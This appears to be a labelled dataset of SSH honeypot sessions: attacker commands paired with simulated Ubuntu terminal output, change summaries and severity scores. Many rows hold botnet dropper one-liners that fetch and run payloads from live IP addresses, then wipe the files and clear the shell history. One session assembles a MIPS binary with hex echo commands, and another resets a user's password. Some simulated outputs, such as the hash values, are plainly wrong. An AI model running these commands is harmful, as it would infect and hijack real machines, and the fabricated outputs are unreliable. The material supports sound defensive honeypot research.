f1cdcd039d60 | 2021_2022 | 31 | echo -ne '\xaf\xa2\x00\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x10\xe0\x00\x02\x27\xbd\x00\x20\x00\x02\x10\x23\x03\xe0\x00\x08\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x81\x10\x03\x99\xe0\x21\x27\xbd\xff\xd8\xaf\xbf\x00\x20\xaf\xbc\x00\x10\xaf\xa4\x00\x28\x8f\xa2\x00\x28\x00\x00\x00\x00\x2c\x42\xf0\x01\x14\x40\x00\x0f\x00\x... | root@ubuntu:/sys# echo -ne '\xaf\xa2\x00\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x10\xe0\x00\x02\x27\xbd\x00\x20\x00\x02\x10\x23\x03\xe0\x00\x08\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x81\x10\x03\x99\xe0\x21\x27\xbd\xff\xd8\xaf\xbf\x00\x20\xaf\xbc\x00\x10\xaf\xa4\x00\x28\x8f\xa2\x00\x28\x00\x00\x00\x00\x2c\x42\xf0\x01\x14... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 32 | echo -ne '\x10\x00\x00\x04\x00\x00\x00\x00\x8f\xa2\x00\x28\x00\x00\x00\x00\xaf\xa2\x00\x18\x8f\xa2\x00\x18\x8f\xbf\x00\x20\x27\xbd\x00\x28\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x80\x80\x03\x99\xe0\x21\x27\xbd\xff\xe0\xaf\xbf\x00\x18\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x... | root@ubuntu:/sys# echo -ne '\x10\x00\x00\x04\x00\x00\x00\x00\x8f\xa2\x00\x28\x00\x00\x00\x00\xaf\xa2\x00\x18\x8f\xa2\x00\x18\x8f\xbf\x00\x20\x27\xbd\x00\x28\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x80\x80\x03\x99\xe0\x21\x27\xbd\xff\xe0\xaf\xbf\x00\x18\xaf\xbc\x00\x10\x8f... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 33 | echo -ne '\x6d\x69\x70\x73\x00\x00\x00\x00\x6e\x74\x70\x63\x6c\x69\x65\x6e\x74\x00\x00\x00\x47\x45\x54\x20\x2f\x73\x73\x68\x2f\x6e\x65\x77\x2f\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x40\x00\x00\x00\x... | root@ubuntu:/sys# echo -ne '\x6d\x69\x70\x73\x00\x00\x00\x00\x6e\x74\x70\x63\x6c\x69\x65\x6e\x74\x00\x00\x00\x47\x45\x54\x20\x2f\x73\x73\x68\x2f\x6e\x65\x77\x2f\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 34 | echo -ne '\x00\x40\x00\xe4\x00\x40\x04\xc0\x00\x40\x08\x20\x00\x40\x01\x00\x00\x40\x07\xd0\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67\x6f\x74\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x... | root@ubuntu:/sys# echo -ne '\x00\x40\x00\xe4\x00\x40\x04\xc0\x00\x40\x08\x20\x00\x40\x01\x00\x00\x40\x07\xd0\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67\x6f\x74\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 35 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x09\x00\x00\x00\x09\x00\x00\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x41\x09\x40\x00\x00\x09\x40\x00\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x09\x00\x00\x00\x09\x00\x00\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x41\x09\x40\x00... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 36 | echo -ne '\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x94\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45' | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x94\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
ECHODONE
root@ubuntu:/sys# |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 37 | ./ddnsclient; chmod 777 ntpclient; ./ntpclient | root@ubuntu:/sys# ./ddnsclient
date
root@ubuntu:/sys# chmod 777 ntpclient
root@ubuntu:/sys# ./ntpclient
date
root@ubuntu:/sys# |
- The 'ddnsclient' and 'ntpclient' scripts were executed.
- The 'ntpclient' file permissions were changed to 777 (full permissions for all users). | 3 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 38 | kill %%1 | root@ubuntu:/sys# kill %%1
root@ubuntu:/sys# |
- The job with ID 1 was terminated. | 3 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 39 | echo A | root@ubuntu:/sys# echo A
A
root@ubuntu:/sys# |
- The string 'A' was printed to the terminal. | 0 | curated_ubuntu |
d4d3100ccb94 | 2021_2022 | 0 | cd /tmp || cd /; wget -q http://209.141.40.31/Y91/x86; curl -O http://209.141.40.31/Y91/x86 chmod +x *; ./x86 | root@ubuntu:~# cd /tmp || cd /
root@tmp:~# wget -q http://209.141.40.31/Y91/x86
root@tmp:~# curl -O http://209.141.40.31/Y91/x86
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 28 100 28 0 0 ... |
- The terminal changed the working directory to '/tmp'.
- A file named 'x86' was downloaded from the server with IP '209.141.40.31' using wget and curl.
- All files in the '/tmp' directory were given execute permissions.
- The downloaded 'x86' file was executed. | 3 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 0 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 1 | echo -e "oracle\nkm7DnjRUG3wa\nkm7DnjRUG3wa"|passwd|bash | root@ubuntu:~# echo -e "oracle\nkm7DnjRUG3wa\nkm7DnjRUG3wa"|passwd|bash
New password: Retype new password: passwd: password updated successfully
root@ubuntu:~# | The password for the user 'oracle' has been changed to 'km7DnjRUG3wa'. | 4 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 2 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 3 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 567890 12345 67890 123456
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 4 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 5 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 6 | crontab -l | root@ubuntu:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hou... | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 7 | w | root@ubuntu:~# w
17:36:16 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 15:36 2.00s 0.03s 0.00s w
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 8 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 9 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 10 | top | root@ubuntu:~# top
top - 17:37:33 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 725938364 total, 567890 free, 123456 used, 123456 buff/cache
MiB Swap: ... | None | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 11 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 12 | uname -a | root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Thu Oct 31 17:39:11 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f5b933a3987e | 2021_2022 | 13 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
630a7a165675 | 2021_2022 | 0 | lscpu ; nproc ; wget https://cdn.discordapp.com/attachments/834709504049414155/836553024704348200/NTeleportation.cs | root@ubuntu:~# lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 24
On-line CPU(s) list: 0-23
Thread(s) per core: 2
Core(s) per socket: 12
Socket(s): 1
NUMA node(s): 1
Vendor ID: GenuineIntel
CPU family: 6
... | A file named 'NTeleportation.cs' was downloaded from 'https://cdn.discordapp.com/attachments/834709504049414155/836553024704348200/NTeleportation.cs'. | 3 | curated_ubuntu |
28216cf206e2 | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.139.100/x86/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 194.87.139.100 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.87.139.100; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.139... | root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
root@tmp:~# wget http://194.87.139.100/x86/GhOul.sh
--2023-10-31 17:40:02-- http://194.87.139.100/x86/GhOul.sh
Connecting to 194.87.139.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘GhOu... |
- The terminal changed the working directory to '/tmp'.
- Four shell scripts were downloaded from the server with IP '194.87.139.100' using different methods (wget, tftp, ftpget).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files in the '/tmp' directory were removed. | 4 | curated_ubuntu |
ef2f94ed2119 | 2021_2022 | 0 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh'. | 2 | curated_ubuntu |
ef2f94ed2119 | 2021_2022 | 1 | shell | # shell
sh: shell: not found
# | No changes to the system. The command 'shell' is not recognized in the 'sh' shell. | 0 | curated_ubuntu |
ef2f94ed2119 | 2021_2022 | 2 | help | # help
Built-in commands:
-------------------
. : [ [[ alias bg break cd chdir command continue echo eval exec
exit export false fg getopts hash help history jobs kill let local
printf pwd read readonly return set shift test times trap true
type ulimit umask unalias unset wait
# | No changes to the system. The 'help' command just displayed the built-in commands available in the 'sh' shell. | 0 | curated_ubuntu |
ef2f94ed2119 | 2021_2022 | 3 | busybox | # busybox
BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.
Usage: busybox [function [arguments]...]
or: busybox --list[-full]
or: busybox --install [-s] [DIR]
... | No changes to the system. The 'busybox' command just displayed the version and available commands of BusyBox. | 0 | curated_ubuntu |
41d3e3ebb60b | 2021_2022 | 0 | cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 test; echo firewalla1337 and Anarchy were here | root@ubuntu:~# cat /etc/issue
Ubuntu 18.04.5 LTS \n \l
root@ubuntu:~# cd /tmp
root@ubuntu:/tmp# rm -rf x86_64
root@ubuntu:/tmp# wget http://45.14.149.244/x86_64
--2023-10-31 17:41:38-- http://45.14.149.244/x86_64
Connecting to 45.14.149.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [a... |
- The terminal changed the working directory to '/tmp'.
- A file named 'x86_64' was downloaded from the server with IP '45.14.149.244'.
- The downloaded file was given full permissions and executed with the argument 'test'.
- A string "firewalla1337 and Anarchy were here" was echoed to the terminal. | 3 | curated_ubuntu |
1a06c111290b | 2021_2022 | 0 | sh | root@ubuntu:~# sh
sh-4.4# | The shell has been changed to 'sh'. | 2 | curated_ubuntu |
1a06c111290b | 2021_2022 | 1 | cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.9/sora.sh; curl -O http://136.144.41.9/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 136.144.41.9 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 136.144.41.9; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P ... | sh-4.4# cd /tmp cd /var/run cd /mnt cd /root cd /
sh-4.4# wget http://136.144.41.9/sora.sh
--2023-11-30 00:57:52-- http://136.144.41.9/sora.sh
Connecting to 136.144.41.9:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘sora.sh’
100%[========================... |
- The terminal changed the working directory to '/'.
- Four shell scripts were downloaded from the server with IP '136.144.41.9' using different methods (wget, curl, tftp, ftpget).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files in the '/' directory were removed. | 4 | curated_ubuntu |
9491d49ee960 | 2021_2022 | 0 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh'. | 2 | curated_ubuntu |
9491d49ee960 | 2021_2022 | 1 | shell | # shell
sh: shell: not found
# | No changes to the system. The command 'shell' is not recognized in the 'sh' shell. | 0 | curated_ubuntu |
9491d49ee960 | 2021_2022 | 2 | ls / | # ls /
bin dev home lib32 lost+found mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
# | No changes to the system. The command 'ls /' just listed the directories in the root directory. | 0 | curated_ubuntu |
5f8cd49fd28e | 2021_2022 | 0 | echo -n n06m5xox|md5sum;uname -a | root@ubuntu:~# echo -n n06m5xox|md5sum
d41d8cd98f00b204e9800998ecf8427e -
root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
1d7a036fc284 | 2021_2022 | 0 | uname -s -v -n -r;nproc; | root@ubuntu:~# uname -s -v -n -r
Linux #176-Ubuntu SMP user 5.4.0-159-generic
root@ubuntu:~# nproc
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
a6f34bc8969b | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.108/mtr.sh;; curl -O http://109.104.151.108/mtr.sh; chmod +x mtr.sh; sh mtr.sh; tftp 109.104.151.108 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.108; chmod 777 mtr2.sh; sh mtr2.sh; rm -... | root@ubuntu:~# cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
root@tmp:~# wget http://109.104.151.108/mtr.sh
--2023-10-31 17:43:59-- http://109.104.151.108/mtr.sh
Connecting to 109.104.151.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Sav... |
- The terminal changed the working directory to '/tmp'.
- Three shell scripts were downloaded from the server with IP '109.104.151.108' using different methods (wget, curl, tftp).
- The downloaded scripts were given full permissions and executed.
- All scripts in the '/tmp' directory were removed.
- The command histor... | 4 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 1 | sh | root@ubuntu:~# sh
sh-4.4# | The shell has been changed to 'sh'. | 2 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 2 | shell | sh-4.4# shell
sh: shell: command not found
sh-4.4# | No changes to the system were made. | 0 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 3 | linuxshell | sh-4.4# linuxshell
sh: linuxshell: command not found
sh-4.4# | No changes to the system were made. | 0 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 4 | system | sh-4.4# system
sh: system: command not found
sh-4.4# | No changes to the system were made. | 0 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 5 | ls /home | sh-4.4# ls /home
user1 user2 user3
sh-4.4# | No changes to the system were made. | 0 | curated_ubuntu |
9a4a27609c14 | 2021_2022 | 6 | /bin/busybox CORONA | sh-4.4# /bin/busybox CORONA
sh: /bin/busybox: No such file or directory
sh-4.4# | No changes to the system were made. | 0 | curated_ubuntu |
cf035efd5357 | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | The 'enable' command was executed, but it doesn't change anything in the system as it is used to enable and disable builtin shell commands. | 0 | curated_ubuntu |
cf035efd5357 | 2021_2022 | 1 | sh | root@ubuntu:~# sh
# | The shell was changed to 'sh' from 'bash'. | 2 | curated_ubuntu |
cf035efd5357 | 2021_2022 | 2 | shell | # shell
sh: shell: not found
# | The 'shell' command was attempted, but it is not a recognized command in the 'sh' shell. | 0 | curated_ubuntu |
cf035efd5357 | 2021_2022 | 3 | linuxshell | # linuxshell
sh: linuxshell: not found
# | The 'linuxshell' command was attempted, but it is not a recognized command in the 'sh' shell. | 0 | curated_ubuntu |
cf035efd5357 | 2021_2022 | 4 | system | # system
sh: system: not found
# | The 'system' command was attempted, but it is not a recognized command in the 'sh' shell. | 0 | curated_ubuntu |
cf035efd5357 | 2021_2022 | 5 | /bin/busybox CORONA | # /bin/busybox CORONA
sh: /bin/busybox: not found
# | The '/bin/busybox CORONA' command was attempted, but the 'busybox' binary was not found in the '/bin' directory. | 0 | curated_ubuntu |
be80591472b0 | 2021_2022 | 0 | wget http://109.104.151.108/mtr.sh; busybox wget http://109.104.151.108/mtr.sh; curl -O http://109.104.151.108/mtr.sh; chmod +x mtr.sh; sh mtr.sh; tftp 109.104.151.108 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.108; chmod 777 mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c | root@ubuntu:~# wget http://109.104.151.108/mtr.sh
--2023-10-31 17:48:33-- http://109.104.151.108/mtr.sh
Connecting to 109.104.151.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘mtr.sh’
100%[======================================>] 28 --.-K/s in... |
- Three shell scripts were downloaded from the server with IP '109.104.151.108' using different methods (wget, busybox wget, curl).
- The downloaded scripts were given full permissions and executed.
- All shell scripts in the current directory were removed.
- The command history was cleared. | 4 | curated_ubuntu |
39b9d805d40e | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.10/mtr.sh; busybox http://109.104.151.10/mtr.sh; curl -O http://109.104.151.10/mtr.sh; chmod +x mtr.sh; sh mtr.sh; rm -rf mtr.sh; tftp 109.104.151.10 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109... | root@ubuntu:~# cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
root@tmp:~# wget http://109.104.151.10/mtr.sh
--2023-10-31 17:49:03-- http://109.104.151.10/mtr.sh
Connecting to 109.104.151.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving... |
- The terminal changed the working directory to '/tmp'.
- Three shell scripts were downloaded from the server with IP '109.104.151.10' using different methods (wget, curl, tftp).
- The downloaded scripts were given full permissions and executed.
- All scripts in the '/tmp' directory were removed.
- The command history... | 4 | curated_ubuntu |
3593f9fe5f18 | 2021_2022 | 0 | echo -n AfzDTzW4|md5sum | root@ubuntu:~# echo -n AfzDTzW4|md5sum
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 -
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | The 'enable' command was executed, but it doesn't change anything in the system as it is used to enable and disable builtin shell commands. | 0 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 1 | development | root@ubuntu:~# development
bash: development: command not found
root@ubuntu:~# | The 'development' command was executed, but it is not a recognized command in the Linux terminal. Therefore, no changes were made to the system. | 0 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 2 | system | root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~# | The 'system' command was executed, but it is not a recognized command in the Linux terminal. Therefore, no changes were made to the system. | 0 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 3 | shell | root@ubuntu:~# shell
bash: shell: command not found
root@ubuntu:~# | The 'shell' command was executed, but it is not a recognized command in the Linux terminal. Therefore, no changes were made to the system. | 0 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 4 | sh | root@ubuntu:~# sh
# | The 'sh' command was executed, which changes the current shell to the Bourne shell (sh). | 2 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 5 | runshellcmd | # runshellcmd
sh: runshellcmd: not found
# | The 'runshellcmd' command was executed, but it is not a recognized command in the Bourne shell. Therefore, no changes were made to the system. | 0 | curated_ubuntu |
eeeddf9b10e5 | 2021_2022 | 6 | linuxshell | # linuxshell
sh: linuxshell: not found
# | The 'linuxshell' command was executed, but it is not a recognized command in the Bourne shell. Therefore, no changes were made to the system. | 0 | curated_ubuntu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.